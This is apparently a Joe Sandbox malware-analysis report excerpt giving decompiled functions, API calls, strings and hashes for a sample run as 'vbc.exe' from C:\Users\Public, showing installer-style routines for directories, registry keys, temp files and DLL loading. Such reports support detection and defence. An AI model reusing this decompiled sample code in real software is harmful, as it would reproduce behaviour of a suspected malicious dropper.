CreateFontIndirectW.GDI32(0040CDE0), ref: 00401E38

Strings

Tahoma, xrefs: 00401E1E

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID: Tahoma
API String ID: 3808545654-3580928618
Opcode ID: e9dc967046a9833b494e13a4fbbc470b8de16a0e7eb7b9edd9fcccda2063d4ab
Instruction ID: 65d3cf27749cc92dd64e462d7a068a1de8cb11dbe253a65c0e26eefc01b1c80e
Opcode Fuzzy Hash: e9dc967046a9833b494e13a4fbbc470b8de16a0e7eb7b9edd9fcccda2063d4ab
Instruction Fuzzy Hash: B8015271544245EFE7006BB4AF4AA9E7FB5BF55301F14097DE142BA1E2CBB80006AB2D

Uniqueness

Uniqueness Score: -1.00%

Function 00405840 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405840(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x0040584b
0x0040584f
0x00405852
0x00405858
0x0040585c
0x00405860
0x00405868
0x0040586f
0x00405875
0x0040587c
0x00405883
0x0040588b
0x0040588d
0x00000000
0x0040588d
0x00405897
0x0040589e
0x004058b4
0x00000000
0x00000000
0x00000000
0x004058b6
0x004058ba

APIs

CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405883
GetLastError.KERNEL32 ref: 00405897
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004058AC
GetLastError.KERNEL32 ref: 004058B6

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405866
C:\Users\Public, xrefs: 00405840

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\Public
API String ID: 3449924974-2845914341
Opcode ID: 6ae7c342d9c1b50a082fcf4789916780a4d0616efa07736c5e287c1420eecf92
Instruction ID: cbd092c4ebd5e7b47652c6b2ce971f8280a433404df7830fbb595f789125ae90
Opcode Fuzzy Hash: 6ae7c342d9c1b50a082fcf4789916780a4d0616efa07736c5e287c1420eecf92
Instruction Fuzzy Hash: 43011A72D00619DAEF10EFA0C9447EFBBB8EF04344F00803AD944B6280E7789614CF99

Uniqueness

Uniqueness Score: -1.00%

Function 0040657C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040657C(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}

0x00406593
0x0040659c
0x0040659e
0x0040659e
0x004065a2
0x004065b5
0x004065af
0x004065af
0x004065af
0x004065ce
0x004065e2
0x004065e9

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406593
wsprintfW.USER32 ref: 004065CE
LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004065E2

Strings

UXTHEME, xrefs: 00406585
%s%S.dll, xrefs: 004065C8
\, xrefs: 004065A4

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 3e72c25e5c980310d69f0fc98d502c706aefd7165560ee14c5a883ad11fb6337
Instruction ID: 5ba2db083709ae0eaf9cf6759a8f1877d4d75d4363d7664b3b34a8d65426c280
Opcode Fuzzy Hash: 3e72c25e5c980310d69f0fc98d502c706aefd7165560ee14c5a883ad11fb6337
Instruction Fuzzy Hash: 4AF0F670910219FADF10AB64EE0EF9B366CAB00304F50403AA546F11D0EB7CDA25CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004023EA Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E004023EA(void* __eax, intOrPtr __edx) {
				void* _t18;
				short* _t21;
				int _t22;
				long _t25;
				char _t27;
				int _t30;
				intOrPtr _t35;
				intOrPtr _t39;
				void* _t41;

				_t35 = __edx;
				_t18 = E00402D48(__eax);
				_t39 =  *((intOrPtr*)(_t41 - 0x18));
				 *(_t41 - 0x50) =  *(_t41 - 0x14);
				 *(_t41 - 0x38) = E00402C53(2);
				_t21 = E00402C53(0x11);
				_t34 =  *0x42a2f0 | 0x00000002;
				 *(_t41 - 4) = 1;
				_t22 = RegCreateKeyExW(_t18, _t21, _t30, _t30, _t30,  *0x42a2f0 | 0x00000002, _t30, _t41 + 8, _t30); // executed
				if(_t22 == 0) {
					if(_t39 == 1) {
						E00402C53(0x23);
						_t22 = lstrlenW(0x40b5d8) + _t29 + 2;
					}
					if(_t39 == 4) {
						_t27 = E00402C31(3);
						_pop(_t34);
						 *0x40b5d8 = _t27;
						 *((intOrPtr*)(_t41 - 0x30)) = _t35;
						_t22 = _t39;
					}
					if(_t39 == 3) {
						_t22 = E0040317B(_t34,  *((intOrPtr*)(_t41 - 0x1c)), _t30, 0x40b5d8, 0x1800); // executed
					}
					_t25 = RegSetValueExW( *(_t41 + 8),  *(_t41 - 0x38), _t30,  *(_t41 - 0x50), 0x40b5d8, _t22); // executed
					if(_t25 == 0) {
						 *(_t41 - 4) = _t30;
					}
					_push( *(_t41 + 8));
					RegCloseKey(); // executed
				}
				 *0x42a2c8 =  *0x42a2c8 +  *(_t41 - 4);
				return 0;
			}

0x004023ea
0x004023eb
0x004023f0
0x004023fa
0x00402404
0x00402407
0x00402417
0x00402421
0x00402428
0x00402430
0x0040243e
0x00402442
0x0040244d
0x0040244d
0x00402454
0x00402458
0x0040245d
0x0040245e
0x00402464
0x00402467
0x00402467
0x0040246b
0x00402477
0x00402477
0x00402488
0x00402490
0x00402492
0x00402492
0x00402495
0x0040256d
0x0040256d
0x00402ade
0x00402aea

APIs

RegCreateKeyExW.KERNEL32(00000000,00000000,?,?,?,?,?,?), ref: 00402428
lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsp5B93.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402448
RegSetValueExW.KERNEL32 ref: 00402488
RegCloseKey.KERNEL32(?), ref: 0040256D

Strings

C:\Users\user\AppData\Local\Temp\nsp5B93.tmp, xrefs: 00402439, 00402447, 0040245E, 00402472, 0040247D

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsp5B93.tmp
API String ID: 1356686001-1098459130
Opcode ID: 71f114d009b9ee50bbf06c02ea87a5392997286f50ed36a836319f608d05baec
Instruction ID: 4be5953a60dfee5a88bc6a75bc26a7970e9a4d525f64453ad6d2d9daaf41070d
Opcode Fuzzy Hash: 71f114d009b9ee50bbf06c02ea87a5392997286f50ed36a836319f608d05baec
Instruction Fuzzy Hash: 85216F71E00118BFEB10AFA4DE89DAE7B78EB04358F11843AF505B71D1DBB88D419B68

Uniqueness

Uniqueness Score: -1.00%

Function 00405E16 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405E16(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a584; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}

0x00405e1c
0x00405e22
0x00405e23
0x00405e23
0x00405e28
0x00405e29
0x00405e2c
0x00405e31
0x00405e34
0x00405e3e
0x00405e4b
0x00405e4f
0x00405e57
0x00000000
0x00000000
0x00405e5b
0x00000000
0x00405e5d
0x00405e5d
0x00405e5d
0x00405e60
0x00405e63
0x00405e63
0x00405e66
0x00000000

APIs

GetTickCount.KERNEL32(7556D4C4,C:\Users\user\AppData\Local\Temp\,?,?,"C:\Users\Public\vbc.exe" ,00403448,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00405E34
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\Public\vbc.exe" ,00403448,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00405E4F

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405E1B
nsa, xrefs: 00405E23
"C:\Users\Public\vbc.exe" , xrefs: 00405E16

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\Public\vbc.exe" $C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-1498418707
Opcode ID: ba752c91d03ec01f63b9c4f62f06acfe59d2ba7d741f037e803b5e880a418ded
Instruction ID: 4cf6052b0ced346fb1ee4b1f894cf66bb827df7868a0d4c9989a51242fd2e3ec
Opcode Fuzzy Hash: ba752c91d03ec01f63b9c4f62f06acfe59d2ba7d741f037e803b5e880a418ded
Instruction Fuzzy Hash: 9BF09076700608FBDB008F59DD05A9BBBBDEB95750F10403AFD40F7180E6B09A548B64

Uniqueness

Uniqueness Score: -1.00%

Function 00402C93 Relevance: 7.6, APIs: 5, Instructions: 67
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00402C93(void* _a4, short* _a8, intOrPtr _a12) {
				void* _v8;
				short _v532;
				long _t18;
				intOrPtr* _t27;
				long _t28;

				_t18 = RegOpenKeyExW(_a4, _a8, 0,  *0x42a2f0 | 0x00000008,  &_v8); // executed
				if(_t18 == 0) {
					while(RegEnumKeyW(_v8, 0,  &_v532, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							return 1;
						}
						if(E00402C93(_v8,  &_v532, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E004065EC(3);
					if(_t27 == 0) {
						if( *0x42a2f0 != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyW(_a4, _a8);
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x42a2f0, 0);
				}
				return _t18;
			}

0x00402cb4
0x00402cbc
0x00402ce4
0x00402cce
0x00402d1e
0x00402d24
0x00000000
0x00402d26
0x00402ce2
0x00000000
0x00000000
0x00402ce2
0x00402cf9
0x00402d01
0x00402d08
0x00402d34
0x00000000
0x00000000
0x00402d3c
0x00402d44
0x00000000
0x00000000
0x00000000
0x00402d44
0x00000000
0x00402d17
0x00402d2b

APIs

RegOpenKeyExW.KERNEL32 ref: 00402CB4
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402CF0
RegCloseKey.ADVAPI32(?), ref: 00402CF9
RegCloseKey.ADVAPI32(?), ref: 00402D1E
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402D3C

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: e13740883462cc78ac6c5afbeaba50eff29be6575239932ced4c036c4fe7d772
Instruction ID: 6ed1dcd439a9d73e7b184d3b9e055cec6739c9c837aa6d28afee44abb1cd8dac
Opcode Fuzzy Hash: e13740883462cc78ac6c5afbeaba50eff29be6575239932ced4c036c4fe7d772
Instruction Fuzzy Hash: 6611377150010DFFEF219F90DE89DAE7B6DFB64348F10007AFA01A11A0D7B58E59AA69

Uniqueness

Uniqueness Score: -1.00%

Function 10001759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E10001759(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				struct HINSTANCE__* _t34;
				intOrPtr _t38;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t50;
				intOrPtr _t53;
				signed int _t57;
				signed int _t61;
				void* _t65;
				void* _t66;
				void* _t70;
				void* _t74;

				_t74 = __esi;
				_t66 = __edi;
				_t65 = __edx;
				 *0x1000406c = _a8;
				 *0x10004070 = _a16;
				 *0x10004074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x10004048, E100015B1);
				_push(1); // executed
				_t34 = E10001B18(); // executed
				_t50 = _t34;
				if(_t50 == 0) {
					L28:
					return _t34;
				} else {
					if( *((intOrPtr*)(_t50 + 4)) != 1) {
						E10002286(_t50);
					}
					_push(_t50);
					E100022D0(_t65);
					_t53 =  *((intOrPtr*)(_t50 + 4));
					if(_t53 == 0xffffffff) {
						L14:
						if(( *(_t50 + 0x1010) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t50 + 4)) == 0) {
								_t34 = E100024A9(_t50);
							} else {
								_push(_t74);
								_push(_t66);
								_t12 = _t50 + 0x1018; // 0x1018
								_t57 = 8;
								memcpy( &_v36, _t12, _t57 << 2);
								_t38 = E100015B4(_t50);
								_t15 = _t50 + 0x1018; // 0x1018
								_t70 = _t15;
								 *((intOrPtr*)(_t50 + 0x1020)) = _t38;
								 *_t70 = 4;
								E100024A9(_t50);
								_t61 = 8;
								_t34 = memcpy(_t70,  &_v36, _t61 << 2);
							}
						} else {
							E100024A9(_t50);
							_t34 = GlobalFree(E10001272(E100015B4(_t50)));
						}
						if( *((intOrPtr*)(_t50 + 4)) != 1) {
							_t34 = E1000246C(_t50);
							if(( *(_t50 + 0x1010) & 0x00000040) != 0 &&  *_t50 == 1) {
								_t34 =  *(_t50 + 0x1008);
								if(_t34 != 0) {
									_t34 = FreeLibrary(_t34);
								}
							}
							if(( *(_t50 + 0x1010) & 0x00000020) != 0) {
								_t34 = E1000153D( *0x10004068);
							}
						}
						if(( *(_t50 + 0x1010) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t50);
						}
					}
					_t44 =  *_t50;
					if(_t44 == 0) {
						if(_t53 != 1) {
							goto L14;
						}
						E10002B5F(_t50);
						L12:
						_t50 = _t44;
						L13:
						goto L14;
					}
					_t45 = _t44 - 1;
					if(_t45 == 0) {
						L8:
						_t44 = E100028A4(_t53, _t50); // executed
						goto L12;
					}
					_t46 = _t45 - 1;
					if(_t46 == 0) {
						E10002645(_t50);
						goto L13;
					}
					if(_t46 != 1) {
						goto L14;
					}
					goto L8;
				}
			}

0x10001759
0x10001759
0x10001759
0x10001763
0x1000176b
0x10001778
0x10001786
0x10001789
0x1000178b
0x10001790
0x10001795
0x100018a8
0x100018a8
0x1000179b
0x1000179f
0x100017a2
0x100017a7
0x100017a8
0x100017a9
0x100017af
0x100017b5
0x100017e5
0x100017ec
0x10001810
0x1000184f
0x10001812
0x10001812
0x10001813
0x10001816
0x1000181c
0x10001820
0x10001823
0x10001828
0x10001828
0x1000182f
0x10001835
0x1000183b
0x10001847
0x10001848
0x1000184b
0x100017ee
0x100017ef
0x10001804
0x10001804
0x10001859
0x1000185c
0x10001869
0x10001870
0x10001878
0x1000187b
0x1000187b
0x10001878
0x10001888
0x10001890
0x10001895
0x10001888
0x1000189d
0x00000000
0x1000189f
0x00000000
0x100018a0
0x1000189d
0x100017b9
0x100017bc
0x100017da
0x00000000
0x00000000
0x100017dd
0x100017e2
0x100017e2
0x100017e4
0x00000000
0x100017e4
0x100017be
0x100017bf
0x100017c7
0x100017c8
0x00000000
0x100017c8
0x100017c1
0x100017c2
0x100017d0
0x00000000
0x100017d0
0x100017c5
0x00000000
0x00000000
0x00000000
0x100017c5

APIs

Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D

GlobalFree.KERNEL32(00000000), ref: 10001804
FreeLibrary.KERNEL32(?), ref: 1000187B
GlobalFree.KERNEL32(00000000), ref: 100018A0

Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,00001020), ref: 100022B8

Part of subcall function 10002645: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7

Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020), ref: 100015CD

Strings

, xrefs: 10001881

Memory Dump Source

Source File: 00000005.00000002.1187096377.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.1187091951.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1187101005.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1187106210.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_vbc.jbxd

Similarity

API ID: Global$Free$Alloc$Librarylstrcpy
String ID:
API String ID: 1791698881-3916222277
Opcode ID: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
Opcode Fuzzy Hash: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761

Uniqueness

Uniqueness Score: -1.00%

Function 00401C19 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401C19(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t61;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402C31(3);
				 *((intOrPtr*)(_t64 - 0x50)) = _t57;
				 *(_t64 - 0x10) = _t29;
				_t30 = E00402C31(4);
				 *((intOrPtr*)(_t64 - 0x50)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x10)) = E00402C53(0x33);
				}
				__eflags =  *(_t64 - 0x14) & 0x00000002;
				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402C53(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t59 = E00402C53();
					_t32 = E00402C53();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t59;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x10),  *(_t64 + 8), _t35,  ~( *_t32) & _t32); // executed
					goto L10;
				} else {
					_t61 = E00402C31();
					 *((intOrPtr*)(_t64 - 0x50)) = _t57;
					_t41 = E00402C31(2);
					 *((intOrPtr*)(_t64 - 0x50)) = _t57;
					_t56 =  *(_t64 - 0x14) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t61, _t41,  *(_t64 - 0x10),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x30) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t61, _t41,  *(_t64 - 0x10),  *(_t64 + 8), _t46, _t56, _t64 - 0x30);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
					_push( *(_t64 - 0x30));
					E00406159();
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}

0x00401c19
0x00401c1b
0x00401c22
0x00401c25
0x00401c28
0x00401c32
0x00401c36
0x00401c39
0x00401c42
0x00401c42
0x00401c45
0x00401c49
0x00401c52
0x00401c52
0x00401c55
0x00401c59
0x00401c5b
0x00401cb0
0x00401cb2
0x00401cbd
0x00401cc7
0x00401cca
0x00401cca
0x00401cd3
0x00000000
0x00401c5d
0x00401c64
0x00401c66
0x00401c69
0x00401c6f
0x00401c76
0x00401c79
0x00401ca1
0x00401cd9
0x00401cd9
0x00401c7b
0x00401c89
0x00401c91
0x00401c94
0x00401c94
0x00401c79
0x00401cdc
0x00401cdf
0x00401ce5
0x00402a81
0x00402a81
0x00402ade
0x00402aea

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1

Strings

!, xrefs: 00401C55

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
